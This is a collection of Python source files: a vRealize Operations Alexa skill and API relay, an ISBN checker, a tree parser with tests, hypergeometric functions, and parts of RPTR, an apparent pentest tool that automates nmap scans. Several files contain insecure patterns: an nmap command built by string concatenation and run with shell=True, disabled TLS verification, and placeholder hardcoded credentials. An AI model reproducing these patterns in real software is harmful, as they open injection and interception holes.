#and criticality. Alert definitions are read by group, with the option to list the individual alerts in a group
def group_criticality_alerts(criticality, resource):
request = "api/alerts/query"
method = "POST"
payload = {
'resource-query': {
'resourceKind': [translate_resource_intent(resource)]
},
'activeOnly': True,
'alertCriticality': [criticality.upper()]
}
session.attributes["groupCriticality"] = criticality
alerts = vropsRequest(request,method,payload=payload)
numAllAlerts = str(alerts["pageInfo"]["totalCount"])
speech_output = "There are " + numAllAlerts + " " + criticality + " alerts for monitored " + speechify_resource_intent(resource,1) + ". " + \
"Shall I read the alerts by alert definition?"
textContent = {
'primaryText': {
'text': "<font size='7'>" + speech_output + "</font>",
'type':'RichText'
}
}
groupedAlerts = []
groupedAlerts = group_alerts_by_def(alerts['alerts'],'alertDefinitionId')
with open("sessionData/"+session.sessionId+"groupAlerts", 'w') as outfile:
json.dump(groupedAlerts, outfile)
session.attributes["AlertsIndex"] = 0
session.attributes["CurrentTree"] = "GroupedAlerts"
title = "Total " + criticality + " alerts for " + speechify_resource_intent(resource,1) + "."
return question(speech_output).display_render(
title=title,template="BodyTemplate1",text=textContent,background_image_url=render_template('backgroundImageURL',image="alertcriticalImageURL"))
@ask.intent('ListBadgeAlertsIntent')
#Starts a tree to read active alerts for the stated resource kind for a major badge.
#Alerts are read individually, with the option to get more detail on a resource
def list_badge_alerts(badge, resource):
request = "api/alerts/query"
method = "POST"
payload = {
'resource-query': {
'resourceKind': [translate_resource_intent(resource)]
},
'activeOnly': True,
'alertCriticality': ["CRITICAL","IMMEDIATE","WARNING","INFORMATION"],
'alertImpact': [badge]
}
alerts = vropsRequest(request,method,payload=payload)
numAllAlerts = str(alerts["pageInfo"]["totalCount"])
numImmediateAlerts = str(len(alerts_by_sev(alerts,"IMMEDIATE")))
numCriticalAlerts = str(len(alerts_by_sev(alerts,"CRITICAL")))
speech_output = "There are " + numAllAlerts + " " + badge + " alerts for monitored " + speechify_resource_intent(resource,1) + ". " + \
"Of those " + numCriticalAlerts + " are critical and " + numImmediateAlerts + " are immediate. Shall I read the critical alerts?"
textContent = {
'primaryText': {
'text': "<font size='3'>" + speech_output + "</font>",
'type':'RichText'
}
}
with open("sessionData/"+session.sessionId+"badgeAlerts", 'w') as outfile:
json.dump(alerts, outfile)
session.attributes["AlertsIndex"] = 0
session.attributes["CurrentTree"] = "Alerts"
if (context.System.device.supportedInterfaces.Display):
return question(speech_output).display_render(
title='Welcome to vRealize Operations',text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
return question(speech_output)
@ask.display_element_selected
def element():
fullResponse = on_element_select(request["token"])
return fullResponse
@ask.intent('getAlertsIntent')
@ask.intent('getOverallStatus')
@ask.intent('goodbyeIntent')
def goodbye_msg():
goodbye_msg = render_template('goodbye')
logging.debug("Session Ended")
sessionCleanup()
return statement(goodbye_msg)
@ask.session_ended
def session_ended():
logging.debug("Session Ended")
sessionCleanup()
return "", 200
if __name__ == '__main__':
bearertoken = json.loads(vropsGetToken())
background_thread = Thread(target=datacenter_report)
background_thread.daemon = True
background_thread.start()
app.run(debug=True)
``` |
{
"source": "johnddias/vrops-api-proxy",
"score": 3
} |
#### File: johnddias/vrops-api-proxy/vropsrelay.py
```python
from flask import Flask, Markup, request, json, Response, jsonify
import requests
import logging
import re
import sys
import time
token = ""
#CONFIGURE CREDENTIALS AND FQDN/IP for vR Ops API
user = "admin"
passwd = "password"
host = "x.x.x.x"
# Define if you want to leverage SSL
SSLCERT = ''
SSLKEY = ''
app = Flask(__name__)
def GetToken(user, passwd, host):
if not token:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + user + "\",\r\n \"authSource\" : \"local\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=0)
return response.text
elif int(token["validity"])/1000 < time.time():
url = "https://" + host + "/suite-api/api/versions"
headers = {
'authorization': "vRealizeOpsToken " + token["token"],
'accept': "application/json"
}
response = requests.request("GET", url, headers=headers, verify=0)
if response.status_code == 401:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + user + "\",\r\n \"authSource\" : \"local\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=0)
return response.text
else:
return json.dumps(token)
else:
return json.dumps(token)
def GetResourceStatus(name,host):
global token
token = json.loads(GetToken(user, passwd, host))
url = "https://" + host + "/suite-api/api/resources"
querystring = {"name": name}
headers = {
'authorization': "vRealizeOpsToken " + token["token"],
'accept': "application/json",
}
response = requests.request("GET", url, headers=headers, params=querystring, verify=0)
response_parsed = json.loads(response.text)
return response_parsed
def GetActiveAlerts(badge,reskind,host):
global token
    print(token)
token = json.loads(GetToken(user,passwd,host))
url = "https://" + host + "/suite-api/api/alerts/query"
headers = {
'authorization': "vRealizeOpsToken " + token["token"],
'accept': "application/json",
'content-type': "application/json"
}
querypayload = {
'resource-query': {
'resourceKind': [reskind]
},
'activeOnly': True,
'alertCriticality': ["CRITICAL","IMMEDIATE","WARNING","INFORMATION"],
'alertImpact': [badge]
}
response = requests.request("POST", url, headers=headers, json=querypayload, verify=0)
response_parsed = json.loads(response.text)
return response_parsed
@app.route("/<NAME>", methods=['GET'])
def ResourceStatusReport(NAME=None):
statusInfo = GetResourceStatus(NAME,host)
resp = jsonify(**statusInfo), 200
return(resp)
@app.route("/alerts/<BADGE>/<RESOURCEKIND>", methods=['GET'])
def ActiveAlertsQuery(BADGE=None, RESOURCEKIND=None):
alertsQuery = GetActiveAlerts(BADGE,RESOURCEKIND,host)
resp = jsonify(**alertsQuery), 200
return(resp)
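# Illustrative requests once the relay is running (the port defaults to 5001 below; the badge and
# resource kind values are examples, not an exhaustive list):
#     curl http://localhost:5001/vm-name-here
#     curl http://localhost:5001/alerts/HEALTH/VirtualMachine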
def main(PORT):
# Configure logging - overwrite on every start
logging.basicConfig(filename='vropsrelay.log', filemode='w', level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s')
# stdout
root = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
logging.info("Please navigate to the below URL for the available routes")
if (SSLCERT and SSLKEY):
context = (SSLCERT, SSLKEY)
app.run(host='0.0.0.0', port=PORT, ssl_context=context, threaded=True, debug=True)
else:
app.run(host='0.0.0.0', port=PORT)
if __name__ == "__main__":
PORT = 5001
if (len(sys.argv) == 2):
PORT = sys.argv[1]
main(PORT)
``` |
{
"source": "john-decker/simple_python_scripts",
"score": 4
} |
#### File: john-decker/simple_python_scripts/isbn_validator.py
```python
def isbn_validator(isbn):
running_total=0
multiplier=10
for char in isbn:
if char == "X":
char = "10"
val=int(char)
else:
val=int(char)
new=val*multiplier
running_total += new
multiplier -= 1
is_valid = running_total%11
if is_valid == 0:
return True
else:
return False
def validator_output(isbn):
if isbn_validator(isbn) == True:
message = "ISBN " + isbn + " is valid."
else:
message = "ISBN " + isbn + " is NOT valid."
return message
# eventually reconfigure to accept user input with validation
isbn="0747532699"
isbn2="156881111X"
isbn3="0747532789"
print(validator_output(isbn3))
``` |
{
"source": "johndeighan/PLLParser",
"score": 3
} |
#### File: johndeighan/PLLParser/PLLParser.py
```python
import sys, io, re, pytest
from more_itertools import ilen
from pprint import pprint
from typing import Pattern
from TreeNode import TreeNode
from RETokenizer import RETokenizer
from parserUtils import (
reLeadWS, isAllWhiteSpace, getVersion, rmPrefix, prettyPrint,
traceStr, firstWordOf, chomp, chomp2, runningUnitTests
)
__version__ = getVersion()
# ---------------------------------------------------------------------------
def parsePLL(fh, constructor=TreeNode, *,
debug=False,
**kwargs):
obj = constructor('label')
assert isinstance(obj , TreeNode)
return PLLParser(constructor,
debug=debug,
**kwargs
).parse(fh)
# ---------------------------------------------------------------------------
class PLLParser():
# --- These are the only recognized options
hDefOptions = {
# --- These become attributes of the PLLParser object
'markStr': '*',
'reComment': None,
'reAttr': None,
'tokenizer': None,
'hereDocToken': None,
'commentToken': None
}
# ------------------------------------------------------------------------
def __init__(self, constructor=TreeNode, *,
debug=False,
**kwargs):
self.setOptions(kwargs)
self.constructor = constructor or TreeNode
self.debug = debug
# ------------------------------------------------------------------------
def setOptions(self, hOptions):
# --- Make sure only valid options were passed
for name in hOptions.keys():
if name not in self.hDefOptions:
raise Exception(f"Invalid option: '{name}'")
for name in self.hDefOptions.keys():
if name in hOptions:
value = hOptions[name]
# --- Do some type checking
if name == 'tokenizer':
assert isinstance(value, RETokenizer)
elif name in ('markStr','hereDocToken','commentToken'):
assert type(value) == str
elif name in ('reComment','reAttr'):
assert isinstance(value, Pattern)
else:
value = self.hDefOptions[name]
setattr(self, name, value)
# ------------------------------------------------------------------------
def parse(self, fh):
# --- Returns (rootNode, hSubTrees)
self.numLines = 0
reAttr = self.reAttr
tokzr = self.tokenizer
rootNode = curNode = None
hSubTrees = {}
curLevel = None
debug = self.debug
if debug:
print() # print newline
# --- iter is an iterator. The next value in the iterator
# can be retrieved via nextVal = next(iter)
# We use that to implement HEREDOC syntax
iter = self._generator(fh)
for line in iter:
if debug:
print(f"LINE {self.numLines} = '{traceStr(line)}'", end='')
line = self.chompComment(line)
# if isAllWhiteSpace(line):
if line == '':
if debug:
print(" - skip blank line")
continue
(newLevel, label, marked) = self.splitLine(line)
if debug:
print(f" [{newLevel}, '{label}']")
# --- process first non-empty line
if rootNode == None:
rootNode = curNode = self.mknode(label, tokzr, iter)
# --- This wouldn't make any sense, because the root node
# is returned whether it's marked or not,
# but in case someone does it
if marked:
hSubTrees[firstWordOf(label)] = curNode
curLevel = newLevel
if debug:
print(f" - root node set to '{label}'")
continue
diff = newLevel - curLevel
if diff > 1:
# --- continuation line - append to current node's label
if debug:
print(' - continuation')
curNode['label'] += ' ' + label
# --- Don't change curLevel
elif diff == 1:
assert curNode and isinstance(curNode, self.constructor)
# --- Check for attributes
if reAttr:
result = reAttr.search(label)
if result:
(name, value) = (result.group(1), result.group(2))
if 'hAttr' in curNode:
curNode['hAttr'][name] = value
else:
curNode['hAttr'] = { name: value }
continue
# --- create new child node
if debug:
print(f" - '{label}', new child of '{curNode.asDebugString()}'")
assert not curNode.firstChild
newNode = self.mknode(label, tokzr, iter)
newNode.makeChildOf(curNode)
curNode = newNode
if marked:
hSubTrees[firstWordOf(label)] = curNode
curLevel += 1
elif diff < 0: # i.e. newLevel < curLevel
# --- Move up -diff levels, then create sibling node
if debug:
n = -diff
desc = 'level' if n==1 else 'levels'
print(f' - go up {n} {desc}')
while (curLevel > newLevel):
curLevel -= 1
curNode = curNode.parent
assert curNode
newNode = self.mknode(label, tokzr, iter)
newNode.makeSiblingOf(curNode)
curNode = newNode
if marked:
hSubTrees[firstWordOf(label)] = curNode
elif diff == 0:
# --- create new sibling node
if debug:
print(f" - new sibling of {curNode.asDebugString()}")
assert not curNode.nextSibling
newNode = self.mknode(label, tokzr, iter)
newNode.makeSiblingOf(curNode)
curNode = newNode
if marked:
hSubTrees[firstWordOf(label)] = curNode
else:
raise Exception("What! This cannot happen")
if self.numLines == 0:
raise Exception("parsePLL(): No text to parse")
if not rootNode:
raise Exception("parsePLL(): rootNode is empty")
assert isinstance(rootNode, self.constructor)
return (rootNode, hSubTrees)
# ------------------------------------------------------------------------
def mknode(self, label, tokzr, iter):
# --- Since we implement HEREDOC syntax (by fetching lines
# from iter), we need to fetch tokens now
commentToken = self.commentToken
hereDocToken = self.hereDocToken
node = self.constructor(label)
if tokzr:
lTokens = []
for (type, tokStr) in tokzr.tokens(label):
if commentToken and (type == commentToken):
break
if hereDocToken and (type == hereDocToken):
# --- Grab lines from iterator until no more lines
# or line is all whitespace
lLines = []
s = next(iter)
if self.debug:
print()
print(f"...s = '{s}'")
# --- Check if there's any leading whitespace
leadWS = ''
leadLen = 0
result = reLeadWS.search(s)
if result:
leadWS = result.group(1)
leadLen = len(leadWS)
while s and not isAllWhiteSpace(s):
if leadWS and (s[0:leadLen] != leadWS):
raise SyntaxError("Missing HEREDOC leading whitespace")
s = s[leadLen:]
lLines.append(s + '\n')
s = next(iter, 'any')
if self.debug:
print(f"...s = '{s}'")
rmPrefix(lLines)
lTokens.append([hereDocToken, ''.join(lLines)])
else:
lTokens.append([type, tokStr])
node['lTokens'] = lTokens
return node
# ------------------------------------------------------------------------
# --- Since the generator is used to parse HEREDOC strings, which
# should not have comments stripped, the caller of the generator
# must strip off comments if reComment is set
# The generator will ensure that any trailing '\n' is stripped
def _generator(self, fh):
debug = self.debug
# --- Allow passing in a string
if isinstance(fh, str):
fh = io.StringIO(fh)
# --- We'll need the first line to determine
# if there's any leading whitespace, which will
# be stripped from ALL lines (and therefore must
# be there for every subsequent line)
# NOTE: At this point, we can't be in a HEREDOC string,
# so it's safe to strip comments if reComment is set
# NOTE: If the next line is a blank line, fh.readline()
# will return "\n", which is not falsey
line = self.getLine(fh)
if line == None:
if debug:
print(" GEN: EOF")
return
line = self.chompComment(line)
while line == '':
line = self.getLine(fh)
if line == None:
if debug:
print(" GEN: EOF")
return
line = self.chompComment(line)
# --- Check if there's any leading whitespace
leadWS = ''
leadLen = 0
result = reLeadWS.search(line)
if result:
leadWS = result.group(1)
leadLen = len(leadWS)
if leadWS:
if debug:
print(" GEN: found leading whitespace")
while line != None:
if line: # i.e. not the empty string
# --- Check if the required leadWS is present
if (line[0:leadLen] != leadWS):
raise SyntaxError("Missing leading whitespace")
yield line[leadLen:]
else:
yield ''
line = self.getLine(fh)
else:
if debug:
print(" GEN: no leading whitespace")
while line != None:
yield line
line = self.getLine(fh)
if debug:
print(" GEN: EOF (DONE)")
return
# ------------------------------------------------------------------------
def getLine(self, fh):
# --- Retrieves next line, chomps off any trailing '\n',
# removes any trailing whitespace, increments self.numLines
# Returns None on EOF
line = fh.readline()
if not line:
return None
self.numLines += 1
return chomp(line).rstrip()
# ---------------------------------------------------------------------------
def chompComment(self, line):
reComment = self.reComment
if reComment:
line = re.sub(reComment, '', line)
return line.rstrip()
# ------------------------------------------------------------------------
def splitLine(self, line):
# --- All whitespace lines should never be passed to this function
assert type(line) == str
assert not isAllWhiteSpace(line)
# --- returns (level, label, marked)
# label will have markStr removed
markStr = self.markStr
(indent, label) = chomp2(line)
if ' ' in indent:
raise SyntaxError(f"Indentation '{traceStr(indent)}'"
" cannot contain space chars")
level = len(indent)
# --- Check if the mark string is present
# If so, strip it to get label, then set key = label
marked = False
if markStr:
if (label.find(markStr) == 0):
label = label[len(self.markStr):].lstrip()
if len(label) == 0:
raise SyntaxError("Marked lines cannot be empty")
marked = True
return (level, label, marked)
# ---------------------------------------------------------------------------
# UNIT TESTS
# ---------------------------------------------------------------------------
if runningUnitTests():
def test_1():
(tree, hSubTrees) = parsePLL('''
top
peach
fuzzy
navel
pink
apple
red
''')
n = ilen(tree.children())
assert n == 2
n = ilen(tree.siblings())
assert n == 0
# --- descendents() includes the node itself
n = ilen(tree.descendents())
assert n == 6
assert ilen(tree.firstChild.children()) == 2
assert tree['label'] == 'top'
assert tree.firstChild['label'] == 'peach'
node = tree.firstChild.firstChild
        assert node['label'] == 'fuzzy navel'
# ------------------------------------------------------------------------
def test_2():
# --- Root node can have siblings, i.e. input does not
# need to be a true tree
(tree, hSubTrees) = parsePLL('''
top
peach
fuzzy
navel
pink
apple
red
next
child of next
''')
n = ilen(tree.children())
assert n == 2
n = ilen(tree.siblings())
assert n == 1
# --- descendents() includes the node itself
n = ilen(tree.descendents())
assert n == 6
assert tree['label'] == 'top'
assert tree.firstChild['label'] == 'peach'
assert tree.nextSibling['label'] == 'next'
assert tree.nextSibling.firstChild['label'] == 'child of next'
# ------------------------------------------------------------------------
# Test some invalid input
def test_3():
s = '''
main
peach
apple
'''
with pytest.raises(SyntaxError):
parsePLL(s)
# ------------------------------------------------------------------------
def test_4():
# --- No support for indenting with spaces yet
# Below, both 'peach' and 'apple' are indented with spaces
s = '''
main
peach
apple
'''
with pytest.raises(SyntaxError):
parsePLL(s)
# ------------------------------------------------------------------------
def test_5():
        # --- By default, neither comments nor attributes are recognized
(tree, hSubTrees) = parsePLL('''
top
number = 5 # not an attribute
peach # not a comment
apple
''')
assert tree['label'] == 'top'
child1 = tree.firstChild
child2 = tree.firstChild.nextSibling
assert child1['label'] == 'number = 5 # not an attribute'
assert child2['label'] == 'peach # not a comment'
# ------------------------------------------------------------------------
# Test if it will parse fragments
    def test_5b():
s = '''
menubar
file
new
open
edit
undo
layout
row
EditField
SelectField
'''
(tree, hSubTrees) = parsePLL(s, debug=False)
n = ilen(tree.descendents())
assert n == 6
n = ilen(tree.followingNodes())
assert n == 10
# ------------------------------------------------------------------------
# Test marked subtrees
def test_6():
s = '''
App
* menubar
file
new
open
edit
undo
* layout
row
EditField
SelectField
'''
(tree, hSubTrees) = parsePLL(s, debug=False)
subtree1 = hSubTrees['menubar']
subtree2 = hSubTrees['layout']
n = ilen(tree.descendents())
assert n == 11
assert (subtree1['label'] == 'menubar')
n = ilen(subtree1.descendents())
assert n == 6
assert (subtree2['label'] == 'layout')
n = ilen(subtree2.descendents())
assert n == 4
n = ilen(tree.followingNodes())
assert n == 11
# ------------------------------------------------------------------------
# --- Test stripping comments
def test_7():
(node, hSubTrees) = parsePLL('''
bg # a comment
color = \\#abcdef # not a comment
graph
''',
reComment=re.compile(r'(?<!\\)#.*$'), # ignore escaped '#' char
debug=False
)
n = ilen(node.descendents())
assert n == 3
assert node['label'] == 'bg'
assert node.firstChild['label'] == 'color = \\#abcdef'
assert node.firstChild.nextSibling['label'] == 'graph'
# ------------------------------------------------------------------------
# --- test hAttr key
def test_8():
(node,h) = parsePLL('''
mainWindow
*menubar
align=left
flow = 99
--------------
not an option
*layout
life= 42
meaning =42
''',
reAttr=re.compile(r'^(\S+)\s*\=\s*(.*)$'),
)
menubar = h['menubar']
assert menubar
assert isinstance(menubar, TreeNode)
hOptions1 = menubar.get('hAttr')
assert hOptions1 == {
'align': 'left',
'flow': '99',
}
layout = h['layout']
assert layout
assert isinstance(layout, TreeNode)
hOptions2 = layout.get('hAttr')
assert hOptions2 == {
'life': '42',
'meaning': '42',
}
# ------------------------------------------------------------------------
def test_9():
# --- Note that this regexp allows no space before the colon
# and requires at least one space after the colon
reWithColon = re.compile(r'^(\S+):\s+(.*)$')
(node,h) = parsePLL('''
mainWindow
*menubar
align: left
flow: 99
notAnOption : text
notAnOption:moretext
--------------
not an option
*layout
life: 42
meaning: 42
''',
reAttr=reWithColon,
)
menubar = h['menubar']
assert menubar
assert isinstance(menubar, TreeNode)
hOptions1 = menubar.get('hAttr')
assert hOptions1 == {
'align': 'left',
'flow': '99',
}
layout = h['layout']
assert layout
assert isinstance(layout, TreeNode)
hOptions2 = layout.get('hAttr')
assert hOptions2 == {
'life': '42',
'meaning': '42',
}
# ------------------------------------------------------------------------
# Test tokenizing
def test_10():
tokzr = RETokenizer()
assert tokzr
tokzr.add('IDENTIFIER', r'[A-Za-z][A-Za-z0-9_]*')
tokzr.add('INTEGER', r'\d+', 0, int)
tokzr.add('STRING', r'"([^"]*)"', 1)
tokzr.add('STRING', r"'([^']*)'", 1)
(node, hSubTrees) = parsePLL('''
x = 23 + 19
print(x)
''', tokenizer=tokzr)
lTokens = list(node.tokens())
assert lTokens == [
['IDENTIFIER', 'x'],
['OTHER', '='],
['INTEGER', 23],
['OTHER', '+'],
['INTEGER', 19],
]
lTokens = list(node.nextSibling.tokens())
assert lTokens == [
['IDENTIFIER', 'print'],
['OTHER', '('],
['IDENTIFIER', 'x'],
['OTHER', ')'],
]
# ------------------------------------------------------------------------
# Test creating a COMMENT token (but not used yet)
def test_11():
tokzr = RETokenizer()
assert tokzr
tokzr.add('IDENTIFIER', r'[A-Za-z][A-Za-z0-9_]*')
tokzr.add('INTEGER', r'\d+', 0, int)
tokzr.add('STRING', r'"([^"]*)"', 1)
tokzr.add('STRING', r"'([^']*)'", 1)
tokzr.add('COMMENT', r'#')
(node, hSubTrees) = parsePLL('''
x = 23 + 19 # word
print(x) # word
''', tokenizer=tokzr)
lTokens = list(node.tokens())
assert lTokens == [
['IDENTIFIER', 'x'],
['OTHER', '='],
['INTEGER', 23],
['OTHER', '+'],
['INTEGER', 19],
['COMMENT', '#'],
['IDENTIFIER', 'word'],
]
lTokens = list(node.nextSibling.tokens())
assert lTokens == [
['IDENTIFIER', 'print'],
['OTHER', '('],
['IDENTIFIER', 'x'],
['OTHER', ')'],
['COMMENT', '#'],
['IDENTIFIER', 'word'],
]
# ------------------------------------------------------------------------
# Test using commentToken
def test_12():
tokzr = RETokenizer()
assert tokzr
tokzr.add('IDENTIFIER', r'[A-Za-z][A-Za-z0-9_]*')
tokzr.add('INTEGER', r'\d+', 0, int)
tokzr.add('STRING', r'"([^"]*)"', 1)
tokzr.add('STRING', r"'([^']*)'", 1)
tokzr.add('COMMENT', r'#')
(node, hSubTrees) = parsePLL('''
x = 23 + 19 # word
print(x) # word
''',
tokenizer=tokzr,
commentToken='COMMENT',
)
lTokens = list(node.tokens())
assert lTokens == [
['IDENTIFIER', 'x'],
['OTHER', '='],
['INTEGER', 23],
['OTHER', '+'],
['INTEGER', 19],
]
lTokens = list(node.nextSibling.tokens())
assert lTokens == [
['IDENTIFIER', 'print'],
['OTHER', '('],
['IDENTIFIER', 'x'],
['OTHER', ')'],
]
# ------------------------------------------------------------------------
# Test using hereDocToken
def test_13():
tokzr = RETokenizer()
assert tokzr
tokzr.add('IDENTIFIER', r'[A-Za-z][A-Za-z0-9_]*')
tokzr.add('INTEGER', r'\d+', 0, int)
tokzr.add('STRING', r'"([^"]*)"', 1)
tokzr.add('STRING', r"'([^']*)'", 1)
tokzr.add('COMMENT', r'#')
tokzr.add('HEREDOC', r'<<<')
(node, hSubTrees) = parsePLL('''
s = <<<
abc
xyz
print(x)
''',
tokenizer=tokzr,
hereDocToken='HEREDOC',
)
lTokens = list(node.tokens())
prettyPrint(lTokens)
assert lTokens == [
['IDENTIFIER', 's'],
['OTHER', '='],
['HEREDOC', 'abc\nxyz\n'],
]
lTokens = list(node.nextSibling.tokens())
assert lTokens == [
['IDENTIFIER', 'print'],
['OTHER', '('],
['IDENTIFIER', 'x'],
['OTHER', ')'],
]
# ---------------------------------------------------------------------------
# To Do:
# 1. Allow spaces for indentation
``` |
{
"source": "JohnDeJesus22/DataScienceMathFunctions",
"score": 4
} |
#### File: JohnDeJesus22/DataScienceMathFunctions/hypergeometricfunctions.py
```python
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import comb
def hypergeom_pmf(N, A, n, x):
'''
Probability Mass Function for Hypergeometric Distribution
:param N: population size
:param A: total number of desired items in N
:param n: number of draws made from N
:param x: number of desired items in our draw of n items
:returns: PMF computed at x
'''
Achoosex = comb(A,x)
NAchoosenx = comb(N-A, n-x)
Nchoosen = comb(N,n)
return (Achoosex)*NAchoosenx/Nchoosen
def hypergeom_cdf(N, A, n, t, min_value=None):
'''
    Cumulative Distribution Function for the Hypergeometric Distribution
:param N: population size
:param A: total number of desired items in N
:param n: number of draws made from N
:param t: number of desired items in our draw of n items up to t
:returns: CDF computed up to t
'''
if min_value:
return np.sum([hypergeom_pmf(N, A, n, x) for x in range(min_value, t+1)])
return np.sum([hypergeom_pmf(N, A, n, x) for x in range(t+1)])
def hypergeom_plot(N, A, n):
'''
Visualization of Hypergeometric Distribution for given parameters
:param N: population size
:param A: total number of desired items in N
:param n: number of draws made from N
:returns: Plot of Hypergeometric Distribution for given parameters
'''
x = np.arange(0, n+1)
y = [hypergeom_pmf(N, A, n, x) for x in range(n+1)]
plt.plot(x, y, 'bo')
plt.vlines(x, 0, y, lw=2)
plt.xlabel('# of desired items in our draw')
    plt.ylabel('Probabilities')
plt.title('Hypergeometric Distribution Plot')
plt.show()
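# A small usage sketch (hypothetical numbers, not part of the original module):
# drawing n=10 cards from a deck of N=52 containing A=4 aces.
if __name__ == '__main__':
    print(hypergeom_pmf(52, 4, 10, 1))   # P(X = 1), roughly 0.42
    print(hypergeom_cdf(52, 4, 10, 1))   # P(X <= 1), roughly 0.84
    hypergeom_plot(52, 4, 10)            # shows the full distribution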
``` |
{
"source": "johndekroon/RPTR",
"score": 3
} |
#### File: RPTR/core/clip.py
```python
import os
import xml.etree.ElementTree as ET
import conf
import re
class Clip():
def __init__(self, bullet_file = None):
#do something
self.url = ""
self.bullets = []
self.clips = []
self.bullets_xml = None
self.port = None
self.save_path = None
self.bullets_dir = conf.get_config('bullets_dir')
self.plugins_dir = conf.get_config('plugins_dir')
if bullet_file == None:
self.bullet_file = conf.get_config('default_bullet')+".xml"
else:
self.bullet_file = bullet_file+".xml"
#read bullet file and extract bullets from it
def read_bullet(self, url):
self.url = url
#try to read the bullet with ElementTree
try:
self.bullets_xml = ET.parse(self.bullets_dir + self.bullet_file).getroot()
#ElementTree can't read the file. The file is unreadable or the XML is corrupt
except:
print " ! Warning: the bullet "+self.bullet_file+" is invalid or not found"
return False
#loop through bullets and add it to the bullet list
for bullet in self.bullets_xml:
self.bullets.append(self.prepare_bullet(bullet.find('execute').text))
#replace placeholders with actual data
def prepare_bullet(self, bullet):
bullet = bullet.replace('[target]', self.url)
bullet = bullet.replace('[path]', self.bullets_dir)
bullet = bullet.replace('[save_path]', self.save_path)
bullet = bullet.replace('[plugins]', self.plugins_dir)
if self.port != None:
bullet = bullet.replace('[port]', self.port)
return bullet
def get_bullets(self):
return self.bullets
def get_clips(self):
return self.clips
def process_results(self, output):
item_count = len(output)
searchObj = None
self.result_list_size = self.getResultListSize(self.bullets_xml)
result_list = [None] * self.result_list_size
for x in range(0, item_count):
output_item = output[x]
id_tool_log = output_item['id']
output_item = output_item ['output']
bullet = self.bullets_xml[x]
loots = bullet.find('loots')
for loot in loots:
regex = loot.find('regex').text
#print regex
searchObj = re.search(regex, output_item)
if searchObj:
new_clip = self.saveFind(loot, 'execute')
if new_clip is not None:
self.clips.append(new_clip)
results = loot.find('results')
try:
for result in results:
id = result.find('id').text
desc = self.saveFind(result, 'description')
result_list.append({'id': id, 'desc': desc, 'id_tool_log': id_tool_log, 'match': searchObj.group(0), 'prove': output})
except:
continue
return self.group_results(result_list)
def group_results(self, result_list):
resultGroupList = [None] * self.result_list_size
for result in result_list:
if result == None:
continue
rid = int(result['id'])
if resultGroupList[rid] == None:
resultGroupList[rid] = {'prove': result['prove'], 'id_tool_log': result['id_tool_log'], 'match': result['match'], 'description': result['desc']}
if result['desc'] == None:
continue
else:
resultGroupList[rid]['description'] = resultGroupList[rid]['description'] + result['desc']
return resultGroupList
def saveFind(self, haystack, needle):
needleObj = haystack.find(needle)
return self.saveText(needleObj)
def saveText(self, obj):
result = None
if obj is not None:
result = str(obj.text)
return result
#if someone knows a better way just send your pull request :)
def getResultListSize(self, bullets):
size = 0
for bullet in bullets:
loots = bullet.find('loots')
try:
for loot in loots:
results = loot.find('results')
for result in results:
id = result.find('id')
if id is not None:
id = int(id.text)
if id > size:
size = id
except:
continue
return int(size)+1
def getBulletFile(self):
return self.bullet_file
def setPort(self, port):
self.port = port
def setSavePath(self, save_path):
self.save_path = save_path
```
#### File: RPTR/core/portscan.py
```python
import os
import subprocess
import time
import urllib2
import difflib
import ssl
from lxml import etree
from dbmanager import *
class Portscan():
def __init__(self, id_test, target, save_path):
self.ports = []
self.id_test = id_test
self.target = target
self.save_path = save_path
self.output = None
#fire bullet
self.dbmanager = Dbmanager()
#management interfaces
self.manif = ['ssh', 'telnet', 'vnc', 'ftp', 'mysql', 'microsoft-ds', 'msrpc']
self.manif_found = False
def parse(self, file_name):
port80 = False
doc = etree.parse(file_name)
for x in doc.xpath("//host[ports/port[state[@state='open']]]"):
for open_p in x.xpath("ports/port[state[@state='open']]"):
item = open_p.attrib.values()
port = item[1]
for child in list(open_p):
service = None
product = None
version = None
tunnel = None
for x in child.attrib.iteritems():
if(x[0] == 'name'):
service = x[1]
if(x[0] == 'product'):
product = x[1]
if(x[0] == 'version'):
version = x[1]
if(x[0] == 'tunnel'):
tunnel = x[1]
#following test is added to prevent double scanning
if port == "80":
port80 = True
if port == "443" and port80:
if self.check_diff_80_443(self.target):
print "80 and 443 are same site"
self.ports.append({"port": port, "service": service, "product": product, "version": version, "tunnel": tunnel, "duplicate": True})
continue
#check if management interface is detected
if service in self.manif:
self.manif_found = True
self.ports.append({"port": port, "service": service, "product": product, "version": version, "tunnel": tunnel, "duplicate": False})
def fire_scan(self):
#get current time
start = time.time()
#start tool execution in new proces
command = "nmap --open --top-ports=50 -sV -oX "+self.save_path+"/nmap_scan.xml "+self.target
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
#get output form process
out, err = p.communicate()
self.output = out
#calculate how much time the tool used
exec_time = time.strftime("%H:%M:%S", time.gmtime(time.time() - start))
#write tool output to database
id_tool_log = self.dbmanager.tool_log_create(self.id_test, command, exec_time, out)
#parse result
self.parse(self.save_path+"/nmap_scan.xml")
#if management ports are open, create a vulnerability for it
if self.manif_found:
self.dbmanager.vulnerability_create(self.id_test, id_tool_log, 1, out)
def get_ports(self):
return self.ports
#check if port 80 and 443 are the same
#used to prevent double scanning a website
def check_diff_80_443(self, url):
try:
url = url.replace("'", "")
f = urllib2.urlopen("http://"+url)
html80 = f.read(25000).replace("http://", "https://")
try:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
f = urllib2.urlopen("https://"+url, context=ctx)
except:
f = urllib2.urlopen("https://"+url)
